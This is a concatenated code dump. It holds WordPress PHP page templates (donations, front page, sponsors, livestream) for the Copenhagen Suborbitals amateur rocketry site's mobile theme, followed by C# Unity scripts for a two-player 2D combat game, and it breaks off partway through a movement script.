<a style="color: white;font-weight: bold;font-size:25px;text-decoration: none;" href="<?php echo get_site_url()?>/support-us/">Donate here ></a>
</td>
</tr></table>
<table style="width: 100%; background-color: #FF4F00">
<tr>
<td style="padding: 2.0vw 1.0vw 1.0vw 1.0vw;">
<div>
<div style="margin-bottom: 5px;color: white;">
Sign up for our newsletter here:
</div>
<?php echo do_shortcode('[mc4wp_form id="11166"]') ?>
</div>
</td>
</tr>
</table>
<?php
}
/* NEWSLETTER-DONATE SECTION END --------------------------------------------------------------------------------------------------------------------- */
/* MISSION EXPLAINED SECTION START ----------------------------------------------------------------------------------------------------------------------------- */
?>
<table style="width: 100%;vertical-align:bottom; padding-bottom: 1.0vw; margin-top: 2.0vw;">
<tr>
<td style="height: 6.0vw; padding: 0 0 1.0vw 0;vertical-align:bottom;" >
<span style="Color:black; Font-size:4.5vw;font-weight: bold;line-height: 5.0vw;padding-right: 1.0vw;"><?php echo $about_the_mission_title ?></span>
</td>
</tr>
<tr>
<td style="height: 27.0vw; padding: 3.0vw 0 1.0vw 0;border-top: 1px solid black; border-collapse: collapse;border-top-color: #999999" >
<?php echo $about_the_mission_content ?> </td>
</tr>
</table>
<?php
/* MISSION EXPLAINED SECTION END ------------------------------------------------------------------------------------------------------------------------------ */
/* MORE ABOUT SECTION START ----------------------------------------------------------------------------------------------------------------------------- */
?>
<a href="<?php echo get_site_url()?>/roadmap/nexo-i/">
<div style="height: 50.0vw; width: 100%; margin-bottom: 0; margin-top: 2.0vw; display: block; margin-left: auto; margin-right: auto; background-color:#e7e7e7; background-image: url('<?php echo $more_about_image[url]; ?>'); background-repeat: no-repeat;background-position: center;background-size: 100%;">
<div style="width: 65.0vw;margin-left:23vw;text-align: right;padding-top:2.0vw;">
<div style="Color:#FF4F00; Font-size:4.5vw;font-weight: bold; line-height: 4.5vw;padding-bottom:1.0vw;">
See the Nexø I rocket in detail
</div>
<div style="margin-left:10vw;width: 55.0vw;Font-size:3.0vw; line-height: 4.0vw;padding-bottom:1.0vw;">
See our page with the Nexø I rocket information in all its glorious detail.
</div>
</div>
</div>
</a>
<?php
/* MORE ABOUT SECTION END ------------------------------------------------------------------------------------------------------------------------------- */
/* PR SECTION START ----------------------------------------------------------------------------------------------------------------------------- */
?>
<?php
/* PR SECTION END ------------------------------------------------------------------------------------------------------------------------------- */
?>
</section>
<?php edit_post_link( __( 'Edit', 'twentythirteen' ), '<span class="edit-link">', '</span>' ); ?>
</div>
<?php endwhile; ?>
</div>
</div>
<?php //get_sidebar(); ?>
<?php get_footer(); ?><file_sep>/copsub/default/template_donations.php
<?php
/*
Template Name: Donations Template
*/
?>
<?php get_header();
global $post;
?>
<div id="content">
<div class="<?php wptouch_post_classes(); ?>">
<div class="post-page-head-area bauhaus">
<h2 class="post-title heading-font"><?php wptouch_the_title(); ?></h2>
<?php if ( bauhaus_should_show_author() ) { ?>
<span class="post-author"><?php the_author(); ?></span>
<?php } ?>
</div>
<div class="post-page-content">
<form action="" id="donationform">
<div class="wrapper_donate_section_1">
<div class="main_donate_section_1_overlay_1 overlay_show">
<div style="font: 12.5vw helvetica, sans-serif; font-weight: bold; color: #FFFFFF;padding:0px;margin:0px;">Donate</div>
</div>
<div class="main_donate_section_1_overlay_2 overlay_show">
<div style="font: 2.5vw helvetica, sans-serif; font-weight: bold; color: #FFFFFF;padding:0px;margin:0px;">How much would you like to give?</div>
</div>
<div class="main_donate_section_1_overlay_3 overlay_show">
<div style="font: 2.5vw helvetica, sans-serif; font-weight: normal; color: #ff4f00;padding:0px;margin:0px;"><label for="supporter">Make this a monthly donation</label></div>
</div>
<div class="main_donate_section_1_overlay_4 overlay_show">
<div style="font: 2.5vw helvetica, sans-serif; font-weight: normal; color: #FFFFFF;padding:0px;margin:0px;">
Even though everyone in Copenhagen Suborbitals is working for free, we need earth money to build spaceships. Tools, rent and materials are not free. This is a 100 % crowdfunded project. We need you to get into space!
</div>
</div>
<div class="main_donate_section_1_overlay_5 overlay_show">
<div style="font: 4.5vw helvetica, sans-serif; font-weight: normal; color: #FFFFFF;padding:0px;margin:0px;">Thanks</div>
</div>
<div class="main_donate_section_1_overlay_6 overlay_show">
<div style="font: 1.8vw helvetica, sans-serif; font-weight: normal; color: #ff4f00;padding:0px;margin:0px;">Now we're closer</div>
</div>
</div>
<div class="main_donate_section_1_overlay_7 overlay_show">
<div class="donate-button" id="paypal-donate" onclick="payWithPaypal();">
<div style="font: 3vw helvetica, sans-serif; font-weight: bold;">Donate</div>
<div style="font: 1.8vw helvetica, sans-serif; font-weight: normal;">via PayPal / Credit Card</div>
</div>
</div>
<div class="main_donate_section_1_overlay_8 overlay_show">
<div class="donate-button" id="bank-donate" onclick="jQuery('#bank-transfer-modal').show();">
<div style="font: 3vw helvetica, sans-serif; font-weight: bold;">Donate</div>
<div style="font: 1.8vw helvetica, sans-serif; font-weight: normal;">via Bank Transfer</div>
</div>
</div>
<div class="main_donate_section_1_overlay_9 overlay_show">
<input type="checkbox" id="supporter" name="supporter" value="supporter" style="margin-top:44%;margin-left:30%">
</div>
<div class="main_donate_section_1_overlay_10 overlay_show">
<input type="text" name="a3" id="amount-field" value="" style="">
</div>
<div class="main_donate_section_1_overlay_11 overlay_show">
<select name="currency_code" id="currency_code">
<option value="USD">USD</option>
<option value="DKK">DKK</option>
<option value="EUR">EURO</option>
</select>
</div>
<div class="main_donate_section_1_overlay_12 overlay_show">
<div style="width:100%;background:url('http://copenhagensuborbitals.com/ext/fbtab/dividerline.png') no-repeat;height:1px; "></div>
</div>
<div class="main_donate_section_1_overlay_13 overlay_show">
<div style="width:100%;background:url('http://copenhagensuborbitals.com/ext/fbtab/dividerline.png') no-repeat;height:1px; "></div>
</div>
</form>
<div id="bank-transfer-modal">
<a href="#" id="close" onclick="jQuery('#bank-transfer-modal').hide()">X</a>
<form action="#" id="bank-transfer-modal-content" onsubmit="payWithBankTransfer()">
<p>
Please enter your email address so we can send you the donation instructions:
</p>
<input style="width: 80%" id="bank-transfer-email" type="text" name="email"/>
<a class="button" href="#" onclick="payWithBankTransfer()">Send</a>
</form>
</div>
<!-- Replace with https://www.sandbox.paypal.com/cgi-bin/webscr for testing in the sandbox. Remember to change also the settings in dgx-donate-paypalstd.php -->
<form id="paypal-form" action="https://www.paypal.com/cgi-bin/webscr" method="post" target="_top">
<input type="hidden" name="cmd" value="_s-xclick">
<input type="hidden" id="encrypted-field" name="encrypted" value="">
<input type="submit" value="Donate">
</form>
</div>
</div>
</div>
<?php //get_sidebar(); ?>
<?php get_footer(); ?>
<file_sep>/copsub/default/template_front_sections.php
<?php
/*
Template Name: Frontpage Sections Template (Mobile)
*/
$activate_war_mode = get_field( 'activate_war_mode', 'option' );
if ($activate_war_mode) {
header("Location: " . site_url() . "/nexo/");
die();
}
?>
<?php get_header('front');
$server_name = $_SERVER['SERVER_NAME'];
global $post;
$title = get_field( '_frontpage_template_1_title', $post->ID );
$text = get_field( '_frontpage_template_1_text', $post->ID );
$video_id = esc_attr( strip_tags( trim( get_field( '_frontpage_template_1_video', $post->ID ) ) ) );
$themepath = ( $server_name === 'sb1.local' ? 'http://sb1.local/wp-content/themes/cphsuborbitals' : CHILD_THEME_URI );
//$url_for_steaming_link = get_field( 'url_for_steaming_link', $post->ID );
$url_for_steaming_link = get_youtube_streaming_url_from_text_file();
$url_for_post_link = get_field( 'url_for_post_link', 'option' );
$event_mode_active = get_field( 'event_mode_active', 'option' );
$url_link_ready = get_field( 'url_link_ready', 'option' );
$event_button_text = get_field( 'event_button_text', 'option' );
//var from settings page
$launch_time_date = get_field( 'launch_time_date', 'option' );
$launch_date = date('F jS', strtotime($launch_time_date));
$launch_message = get_field( 'front_launch_message', 'option' );
$time_hiding_countdown_frontpage = get_field( 'time_hiding_countdown_frontpage', 'option' );
$show_countdown_on_frontpage = get_field( 'show_countdown_on_frontpage', 'option' );
//Sections
$front_section_1_active = get_field( 'front_section_1_active', 'option' );
$background_image_front_section_1 = get_field( 'background_image_front_section_1', 'option' );
$front_section_1_headline_l1 = get_field( 'front_section_1_headline_l1', 'option' );
$front_section_1_link_button = get_field( 'front_section_1_link_button', 'option' );
$front_section_2_active = get_field( 'front_section_2_active', 'option' );
$front_section_3_active = get_field( 'front_section_3_active', 'option' );
$front_section_4_active = get_field( 'front_section_4_active', 'option' );
$front_section_5_active = get_field( 'front_section_5_active', 'option' );
/*
-------------------------
[ @-> gets latest blog ]
-------------------------
*/
$query_blog = new WP_Query( array(
'no_found_rows' => true, // counts posts, remove if pagination required
'update_post_meta_cache' => false, // grabs post meta, remove if post meta required
'update_post_term_cache' => false, // grabs terms, remove if terms required (category, tag...)
'post_type' => array( 'post' ),
'posts_per_page' => 6,
'category_name' => 'csblog',
'orderby' => 'date'
) );
?>
<div id="content">
<?php // ###Launch mode section start### ----------------------------------------------------------------------- ?>
<?php //Launch mode background
if ($front_section_1_active) {
?>
<div class="wrapper_front_section_1">
<div class="main_front_section_1"></div>
<?php //---Countdown section--------------- ?>
<div class="main_front_section_1_overlay_1 overlay_show">
<?php
switch ($show_countdown_on_frontpage) {
case "hidden":
echo '<div class="front_launch_countdown"></div>';
break;
case "message":
echo '<div class="front_launch_countdown">';
echo '<div class="front_launch_message">'.$launch_message.' '.$launch_date.'</div>';
echo '</div>';
break;
case "countdown":
if (strtotime('now') <= $time_hiding_countdown_frontpage) {
echo '<div class="front_launch_countdown">';
echo do_shortcode( '[ujicountdown id="NextTest2" expire="'.$launch_time_date.'" hide="true" url="" subscr="Nexø I Launch" recurring="" rectype="second" repeats=""]' );
echo '</div>';
} else {
echo '<div class="front_launch_countdown">';
echo '<div class="front_launch_message">'.$launch_message.'</div>';
echo '</div>';
}
break;
}
?>
<?php if ( $show_countdown_on_frontpage && ( $time_hiding_countdown_frontpage >= strtotime( 'now' ) ) ) {
} else { ?>
<?php } ?>
</div>
<?php //---Countdown section End ---------- ?>
<?php //---Front Text Launch section--------------- ?>
<div class="main_front_section_1_overlay_2 overlay_show">
<?php echo $front_section_1_headline_l1;?>
</div>
<?php //---Front Text Launch section End ---------- ?>
<?php //---Front Mission Page Button section--------------- ?>
<a style="text-decoration: none;" href="<?php echo $front_section_1_link_button ?>" title="" onclick="_gaq.push(['_trackEvent','Media','Click','Watch Us on FP']);">
<div class="main_front_section_1_overlay_4 overlay_show">
Go to the mission page
</div>
</a>
<?php //---Front Mission Page Button End ---------- ?>
<?php //---Front Mission Patch section--------------- ?>
<div class="main_front_section_1_overlay_3 overlay_show">
<div>
<div style="margin-bottom: 5px;color: white;">
Sign up for our newsletter:
</div>
<?php echo do_shortcode('[mc4wp_form id="11166"]') ?>
</div>
</div>
</div>
<?php //---Front Mission Patch section End ---------- ?>
</div>
<?php } ?>
<?php //----------- Launch mode section end ----------------------------------------------------------------------- ?>
<?php //----------- Manned top section -----------------------------------------------------------------------------?>
<div class="wrapper_front_section_2">
<div class="main_front_section_2"></div>
<div class="main_front_section_2_overlay_1 overlay_show">
The world’s only amateur space program
</div>
<div class="main_front_section_2_overlay_2 overlay_show">
<div>We’re 50 geeks building and flying our own rockets. </div>
<div>One of us will fly into space. </div>
</div>
<div class="main_front_section_2_overlay_3 overlay_show">
<table style="height: 100%">
<tr>
<td class="main_front_big_button_S2O3_1">
<a style="text-decoration: none; color: black;" href="<?php $server_name ?>/support-us/" onclick="_gaq.push(['_trackEvent','Support','Click','Big donate button FP']);">
It’s 100 % nonprofit and crowdfunded. Please donate here.
<div><img src="<?php echo get_site_url()?>/wp-content/themes/cphsuborbitals/img/pointer-black.png" style="width: 12%;"></div>
</a>
</td>
<?php if($event_mode_active) {?>
<?php if($url_link_ready) {?>
<td class="main_front_big_button_S2O3_2">
<a style="text-decoration: none;color: black;" href="<?php echo $url_for_steaming_link ?>" onclick="_gaq.push(['_trackEvent','Support','Click','Big download button FP']);">
<?php echo $event_button_text ?>
<div style="font-size: 2.5vw;margin-top: 5%">
Live feed - Click here.
</div>
<div style="padding: 5% 0% 0% 30%;"><img src="<?php echo get_site_url()?>/wp-content/themes/cphsuborbitals/img/testsquare.png" style="width: 55%;"></div>
</a>
</td>
<?php } else {?>
<td class="main_front_big_button_S2O3_2">
<a style="text-decoration: none;color: black;" href="<?php echo $url_for_post_link ?>" onclick="_gaq.push(['_trackEvent','Support','Click','Big download button FP']);">
<?php echo $event_button_text ?>
<div style="font-size: 2.5vw;margin-top: 5%">
Videolink will be made available here as soon as possible.
</div>
<div><img src="<?php echo get_site_url()?>/wp-content/themes/cphsuborbitals/img/pointer-black.png" style="width: 12%;"></div>
</a>
</td>
<?php }?>
<?php } else {?>
<?php }?>
<td class="main_front_big_button_S2O3_3">
<a style="text-decoration: none;color: black;" href="<?php $server_name ?>/ressources/" onclick="_gaq.push(['_trackEvent','Support','Click','Big download button FP']);">
Download posters, wallpapers and more here.
<div><img src="<?php echo get_site_url()?>/wp-content/themes/cphsuborbitals/img/pointer-black.png" style="width: 12%;"></div>
</a>
</td>
<td>
</td>
</tr>
</table>
</div>
<div class="main_front_section_2_overlay_4 overlay_show">
<div>Aiming high:</div>
<div>The manned Spica mission</div>
</div>
<div class="main_front_section_2_overlay_5 overlay_show">
Every step we take leads toward flying a person into space on what will be our biggest rocket: Spica
</div>
<a style="text-decoration: none;" rel="wp-video-lightbox" href="https://www.youtube.com/watch?v=1i3HDv2s7io&width=640&height=640" title="" onclick="_gaq.push(['_trackEvent','Media','Click','Watch Us on FP']);">
<div class="main_front_section_2_overlay_6 overlay_show">
<span style="">See our intro video</span>
<img src="<?php echo get_site_url()?>/wp-content/themes/cphsuborbitals/img/pointer-black.png" style="width: 12%; vertical-align: middle;">
</div>
</a>
</div>
<?php //----------- Manned top section end -------------------------------------------------------------------------?>
<?php //----------- Widget section ---------------------------------------------------------------------------------?>
<div class="wrapper_front_section_3">
<div class="main_front_section_3"></div>
<div class="main_front_section_3_overlay_1 overlay_show">
<div class="front-widget">
<?php // lastest news col ?>
<div class="widget-header-front">Latest blog posts</div>
<ul>
<?php if ( $query_blog->have_posts() ) :
	while ( $query_blog->have_posts() ) : $query_blog->the_post(); ?>
<li>
<?php
printf( '<span class="date">%s</span>', get_the_date( 'd.m.Y' ) );
printf( '<div class="widget-content"><a href="%s">%s</a></div>', get_permalink(), get_the_title() );
?>
</li>
<?php endwhile;
endif;
wp_reset_postdata();
?>
</ul>
</div>
</div>
</div>
<?php //----------- Widget section end -----------------------------------------------------------------------------?>
<?php //----------- Section 4 --------------------------------------------------------------------------------------?>
<div class="wrapper_front_section_4">
<div class="main_front_section_4"></div>
</div>
<?php //----------- Section 4 end ----------------------------------------------------------------------------------?>
<?php //----------- Section 5 --------------------------------------------------------------------------------------?>
<div class="wrapper_front_section_5">
<div class="main_front_section_5"></div>
<div class="main_front_section_5_overlay_1 overlay_show">
We’re 100 % crowdfunded.<br>
Donate or join the support group.<br>
Your money is the rocket fuel!
</div>
<a href="<?php echo (site_url().'/support-us/'); ?>" onclick="_gaq.push(['_trackEvent','Support','Click','Donate on bottom FP']);">
<div class="main_front_section_5_overlay_2 overlay_show"></div>
</a>
</div>
<?php //----------- Section 5 end ----------------------------------------------------------------------------------?>
<?php
?>
</div>
<?php get_footer('frontlaunch'); ?><file_sep>/copsub/default/page-sponsors.php
<?php
/*
Template Name: Sponsors template
*/
?>
<?php get_header();
global $post;
$pre_sponsors_text = get_field( '_pre_sponsors_text', $post->ID );
$gold_company_sponsors = get_field( '_gold_company_sponsors', $post->ID );
$silver_company_sponsors = get_field( '_silver_company_sponsors', $post->ID );
$private_cash_donations = get_field( '_private_cash_donations', $post->ID );
?>
<div id="content">
<div class="<?php wptouch_post_classes(); ?>">
<div class="post-page-head-area bauhaus">
<h2 class="post-title heading-font"><?php wptouch_the_title(); ?></h2>
<?php if ( bauhaus_should_show_author() ) { ?>
<span class="post-author"><?php the_author(); ?></span>
<?php } ?>
</div>
<div class="post-page-content">
<section class="text">
<?php
echo $pre_sponsors_text;
echo $gold_company_sponsors;
echo "<table>";
$type = 'spons';
$args=array(
'post_type' => $type,
'post_status' => 'publish',
'posts_per_page' => -1,
'ignore_sticky_posts' => 1,
'orderby' => 'title',
'order' => 'ASC',
'cat-spons' => 'gold-company-sponsor' );
$my_query = null;
$my_query = new WP_Query($args);
if( $my_query->have_posts() ) {
while ($my_query->have_posts()) : $my_query->the_post();
$weblink_sponsor = get_field( '_sponsor_weblink', get_the_id() );
$logo_sponsor = get_field( '_sponsor_logo', get_the_id() );
if(strlen($weblink_sponsor) > 2) {
if(strlen($logo_sponsor) > 2) {
?>
<tr><td><a href="<?php echo $weblink_sponsor ?>" rel="bookmark" title="Permanent Link to <?php the_title_attribute(); ?>"><img src="<?php echo $logo_sponsor?>" width="60"></a></td></tr>
<?php } ?>
<tr><td><a href="<?php echo $weblink_sponsor ?>" rel="bookmark" title="Permanent Link to <?php the_title_attribute(); ?>"><?php the_title(); ?></a></td></tr>
<?php
} else {
?>
<tr><td><img src="<?php echo $logo_sponsor?>"></td></tr>
<tr><td><?php the_title(); ?></td></tr>
<?php
}
endwhile;
}
wp_reset_query(); // Restore global post data stomped by the_post().
echo "</table>";
echo $silver_company_sponsors;
echo "<table>";
$type = 'spons';
$args=array(
'post_type' => $type,
'post_status' => 'publish',
'posts_per_page' => -1,
'ignore_sticky_posts' => 1,
'orderby' => 'title',
'order' => 'ASC',
'cat-spons' => 'silver-company-sponsor' );
$my_query = null;
$my_query = new WP_Query($args);
if( $my_query->have_posts() ) {
while ($my_query->have_posts()) : $my_query->the_post();
$weblink_sponsor = get_field( '_sponsor_weblink', get_the_id() );
$logo_sponsor = get_field( '_sponsor_logo', get_the_id() );
$hide_sponsorname = get_field( '_hide_sponsorname', get_the_id() );
if(strlen($weblink_sponsor) > 2) {
if(strlen($logo_sponsor) > 2) {
?>
<tr><td><a href="<?php echo $weblink_sponsor ?>" rel="bookmark" title="Permanent Link to <?php the_title_attribute(); ?>"><img src="<?php echo $logo_sponsor?>" width="60"></a></td></tr>
<?php
}
if($hide_sponsorname == FALSE) {
?>
<tr><td><a href="<?php echo $weblink_sponsor ?>" rel="bookmark" title="Permanent Link to <?php the_title_attribute(); ?>"><?php the_title(); ?></a></td></tr>
<?php
}
} else {
?>
<tr><td><img src="<?php echo $logo_sponsor?>"></td></tr>
<tr><td><?php the_title(); ?></td></tr>
<?php
}
endwhile;
}
wp_reset_query(); // Restore global post data stomped by the_post().
echo "</table>";
echo $private_cash_donations;
echo "<table>";
$type = 'spons';
$args=array(
'post_type' => $type,
'post_status' => 'publish',
'posts_per_page' => -1,
'ignore_sticky_posts' => 1,
'orderby' => 'title',
'order' => 'ASC',
'cat-spons' => '' );
$my_query = null;
$my_query = new WP_Query($args);
if( $my_query->have_posts() ) {
while ($my_query->have_posts()) : $my_query->the_post();
$weblink_sponsor = get_field( '_sponsor_weblink', get_the_id() );
$sponsor_country = get_field( 'sponsor_country', get_the_id() );
$term_list = wp_get_post_terms(get_the_id(), 'cat-spons', array("fields" => "all"));
$term_slug = $term_list[0]->slug;
if (($term_slug != 'gold-company-sponsor') && ($term_slug != 'silver-company-sponsor')) {
?>
<tr><td><?php the_title(); ?></td><td><?php echo $sponsor_country; ?></td></tr>
<?php
}
endwhile;
}
wp_reset_query(); // Restore global post data stomped by the_post().
echo "</table>";
?>
</section>
</div>
</div>
<?php get_sidebar(); ?>
<?php get_footer(); ?>
<file_sep>/README.md
# wp-touch-copsub<file_sep>/copsub/default/livestream_template.php
<?php
/*
Template Name: Livestream template
*/
?>
<?php get_header();
$server_name = $_SERVER['SERVER_NAME'];
global $post;
$frontpage_id = get_option('page_on_front');
//$url_for_steaming_link = get_field( 'url_for_steaming_link', $frontpage_id );
$url_for_steaming_link = get_youtube_streaming_url_from_text_file();
?>
<div id="content">
<div class="<?php wptouch_post_classes(); ?>">
<div class="post-page-head-area bauhaus">
<h2 class="post-title heading-font"><?php wptouch_the_title(); ?></h2>
<?php if ( bauhaus_should_show_author() ) { ?>
<span class="post-author"><?php the_author(); ?></span>
<?php } ?>
</div>
<?php while ( have_posts() ) : the_post(); ?>
<div class="post-page-content">
<section class="text">
<?php the_content(); ?>
<?php _e( wp_oembed_get( $url_for_steaming_link ) ); ?>
</section>
<?php edit_post_link( __( 'Edit', 'twentythirteen' ), '<span class="edit-link">', '</span>' ); ?>
</div>
<?php //comments_template(); ?>
<?php endwhile; ?>
</duv>
</div>
<?php //get_sidebar(); ?>
<?php get_footer(); ?>
<file_sep>/copsub/default/dynamic-styles.php
<?php
header('Content-type: text/css');
// I can access any WP or theme functions
// here to get values that will be used in
// dynamic css below
$color = isset($color) ? $color : '#000'; // fallback so the generated CSS stays valid
?>
/* CSS Starts Here */
.example-selector {
color: <?php echo $color; ?>;
}
.wrappertest {
width: 100%;
/* whatever width you want */
display: inline-block;
position: relative;
background-position: center top;
background-repeat:no-repeat;
background-size:210% !important;
}
.wrappertest:after {
padding-top: 56.25%;
/* 16:9 ratio */
display: block;
content: '';
}
.maintest {
position: absolute;
top: 0;
bottom: 0;
right: 0;
left: 0;
/* let's see it! */
color: white;
}
| 3ca411b37ee2c024fc5fa636f80a7b1ffc0942e7 | ["JavaScript", "Markdown", "PHP"] | 10 | PHP | copsub/wp-touch-copsub | 3fac6e60b01367412fef387c221c856bdbab929b | a1e4e2b12faddf3f12c555fc72f1d6503bdb5bf4 | refs/heads/master |
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
public class PlayerCombat : MonoBehaviour
{
public GameObject shield;
public bool shieldInUse = false;
public bool shieldAvailable;
public float shieldCooldown;
public float shieldCooldownLeft;
public string shieldCtrl = "Horizontal_P1";
// Start is called before the first frame update
void Start()
{
shieldAvailable = true;
}
// Update is called once per frame
void Update()
{
shieldCooldownTimer();
}
private void FixedUpdate()
{
useShield();
}
void useShield()
{
if (!shieldInUse && shieldAvailable)
{
            if (Input.GetAxis(shieldCtrl) >= 1f) // avoid exact float equality on axis input
{
Instantiate(shield, transform);
shieldInUse = true;
}
}
}
void shieldCooldownTimer()
{
if (!shieldAvailable)
{
if (shieldCooldownLeft > 0)
{
shieldCooldownLeft -= Time.deltaTime;
}
else if (shieldCooldownLeft <= 0)
{
shieldAvailable = true;
}
}
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
public class Weapon : MonoBehaviour
{
public float offset;
public GameObject projectile;
public Transform shotPoint;
public GameObject Pointer;
private float timeBtwShots;
public float startTimeBtwShots;
public int numberOfShots;
private int shotsLeft;
public float shotsCoolDown;
private float cooldownLeft;
private bool onCoolDown;
private string control;
private float rotationZ;
public string shootButton = "Fire1_P1";
void Start()
{
shotsLeft = numberOfShots;
onCoolDown = false;
control = gameObject.GetComponentInParent<Movement>().horizontalCtrl; // Check if being controlled by mouse or joystick
}
void Update()
{
if (onCoolDown){
if (cooldownLeft > 0)
{
cooldownLeft -= Time.deltaTime;
}
else if( cooldownLeft <= 0)
{
onCoolDown = false;
shotsLeft = numberOfShots;
}
}
//Handles the fireball rotation
if (control == "Horizontal_P1")
{
Vector3 difference = Camera.main.ScreenToWorldPoint(Input.mousePosition) - transform.position;
rotationZ = Mathf.Atan2(difference.y, difference.x) * Mathf.Rad2Deg;
Pointer.transform.rotation = Quaternion.Euler(0f, 0f, rotationZ);
}else if(control == "Horizontal_P2")
{
float horizontal = Input.GetAxis("RightAnalog_horizontal");
float vertical = Input.GetAxis("RightAnalog_vertical");
if (horizontal != 0 || vertical != 0 )
{
rotationZ = Mathf.Atan2(horizontal, vertical) * Mathf.Rad2Deg;
Pointer.transform.rotation = Quaternion.Euler(new Vector3(0f, 0f, rotationZ + offset));
}
}
if (timeBtwShots <= 0 && shotsLeft > 0)
{
if (Input.GetButton(shootButton))
{
if (control == "Horizontal_P1")
{
Instantiate(projectile, shotPoint.position, Quaternion.Euler(0f, 0f, rotationZ + offset));
timeBtwShots = startTimeBtwShots;
shotsLeft--;
}
else if (control == "Horizontal_P2")
{
Instantiate(projectile, shotPoint.position, Quaternion.Euler(0f, 0f, rotationZ + offset - 90));
timeBtwShots = startTimeBtwShots;
shotsLeft--;
}
}
}
else if (shotsLeft == 0 && !onCoolDown)
{
cooldownLeft = shotsCoolDown;
onCoolDown = true;
}
else
{
timeBtwShots -= Time.deltaTime;
}
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
public class Shield : MonoBehaviour
{
private int lifes = 3;
public float shieldLifeTime;
private float shieldTimeRemaining;
// Start is called before the first frame update
void Start()
{
shieldTimeRemaining = shieldLifeTime;
}
// Update is called once per frame
void Update()
{
if (lifes <= 0)
{
DestroyShield();
}
shieldTimeRemaining -= Time.deltaTime;
if(shieldTimeRemaining <= 0)
{
DestroyShield();
}
}
private void OnTriggerEnter2D(Collider2D collision)
{
if (collision.CompareTag("Bullet"))
{
lifes--;
collision.GetComponent<Bullet>().DestroyBullet();
}
}
private void DestroyShield()
{
Destroy(gameObject);
FindObjectOfType<PlayerCombat>().shieldInUse = false;
FindObjectOfType<PlayerCombat>().shieldCooldownLeft = FindObjectOfType<PlayerCombat>().shieldCooldown;
FindObjectOfType<PlayerCombat>().shieldAvailable = false;
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
public class Projectile : MonoBehaviour
{
public float speed;
public float lifeTime;
//public GameObject destroyEffect;
public float distance;
public LayerMask WhatToHit;
// Start is called before the first frame update
void Start()
{
Invoke("DestroyProjectile", lifeTime);
}
// Update is called once per frame
void Update()
{
RaycastHit2D hitInfo = Physics2D.Raycast(transform.position, transform.up, distance, WhatToHit);
if (hitInfo.collider != null)
{
if (hitInfo.collider.CompareTag("Enemy"))
{
hitInfo.collider.GetComponent<Enemy>().TakeDamage(20);
}
DestroyProjectile();
}
transform.Translate(Vector2.up * speed * Time.deltaTime);
}
private void OnTriggerEnter2D(Collider2D collision)
{
if (collision.CompareTag("Player1")|| collision.CompareTag("Player2")) {
collision.GetComponent<Player>().damage(15);
Vector3 direction = transform.position - collision.transform.position; //get the direction of collision
direction = direction * -1; // Invert the direction
collision.GetComponent<Player>().KnockBack(direction); //Knockback the player
DestroyProjectile();
}
}
void DestroyProjectile()
{
//Instantiate(destroyEffect, transform.position, Quaternion.identity);
Destroy(gameObject);
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine.SceneManagement;
using UnityEngine;
public class GameOverManager : MonoBehaviour
{
public float restartDelay = 5f;
public Player player1;
public Player player2;
Animator anim;
float restartTimer;
private void Awake()
{
anim = GetComponent<Animator>();
}
private void Update()
{
if(player1.isDead())
{
Player2Won();
}else if (player2.isDead())
{
Player1Won();
}
}
public void Player1Won()
{
anim.SetTrigger("Player1Won");
restartTimer += Time.deltaTime;
if (restartTimer >= restartDelay)
{
SceneManager.LoadScene(SceneManager.GetActiveScene().name);
}
}
public void Player2Won()
{
anim.SetTrigger("Player2Won");
restartTimer += Time.deltaTime;
if (restartTimer >= restartDelay)
{
SceneManager.LoadScene(SceneManager.GetActiveScene().name);
}
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
public class HealthBar : MonoBehaviour
{
public Player player;
private void HealthSystem_OnHealthChanged(object sender, System.EventArgs e)
{
transform.Find("Container").localScale = new Vector3(player.GetHealthPercent(), 1);
}
private void Update()
{
if (player.GetHealthPercent() > 0)
{
transform.Find("Container").localScale = new Vector3(player.GetHealthPercent(), 1);
}
else
{
transform.Find("Container").localScale = new Vector3(0, 1);
}
}
}
<file_sep># Unity 2D Game
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
public class Bullet : MonoBehaviour
{
public float speed;
public float destroyDelay;
private float destroyTimer;
private Transform player;
private Vector2 target;
private Vector3 movementVector;
    private void Start()
    {
        player = GameObject.FindGameObjectWithTag("Player").transform;
        target = new Vector2(player.position.x, player.position.y);
        movementVector = (player.position - transform.position).normalized * speed;
        Destroy(gameObject, 10f); // schedule cleanup once instead of re-scheduling every frame
    }
    private void Update()
    {
        transform.position += movementVector * Time.deltaTime;
    }
private void OnTriggerEnter2D(Collider2D collision)
{
DestroyBullet();
if (collision.CompareTag("Player"))
{
collision.GetComponent<Player>().damage(15);
FindObjectOfType<AudioManager>().Play("Hurt");
}
}
public void DestroyBullet()
{
Destroy(gameObject);
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
public class Player : MonoBehaviour
{
private Transform position;
private int health;
private int healthMax = 100;
private Rigidbody2D rb2d;
// Start is called before the first frame update
void Start()
{
health = healthMax;
rb2d = GetComponent<Rigidbody2D>();
}
// Update is called once per frame
void Update()
{
position = gameObject.transform;
}
public Transform GetPlayerPosition()
{
return position;
}
public void damage(int amount)
{
health -= amount;
}
public void heal(int amount)
{
health += amount;
}
public float GetHealthPercent()
{
return (float)health / healthMax;
}
public int getHealth()
{
return health;
}
public bool isDead()
{
return health <= 0;
}
public void KnockBack(Vector3 direction)
{
rb2d.velocity = new Vector2(0, 0);
rb2d.AddForce(direction * 7, ForceMode2D.Impulse);
}
}
<file_sep>using UnityEngine;
using UnityEngine.SceneManagement;
public class GameHandler : MonoBehaviour
{
public HealthBar healthBar;
public float restartDelay = 1f;
// Start is called before the first frame update
private void Start()
{
FindObjectOfType<AudioManager>().Play("Music");
}
private void Update()
{
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
public class Movement : MonoBehaviour
{
public float movespeed = 20f;
public float JumpPower = 5f;
public bool isGrounded = false;
public bool isRunning = false;
public bool facingRight = true;
public float direction = 1f;
public int jumpsMade = 0;
public string jumpButton = "Jump_P1";
public string horizontalCtrl = "Horizontal_P1";
private Animator anim;
private SpriteRenderer spriteR;
private Rigidbody2D rb;
// Start is called before the first frame update
void Start()
{
anim = GetComponent<Animator>();
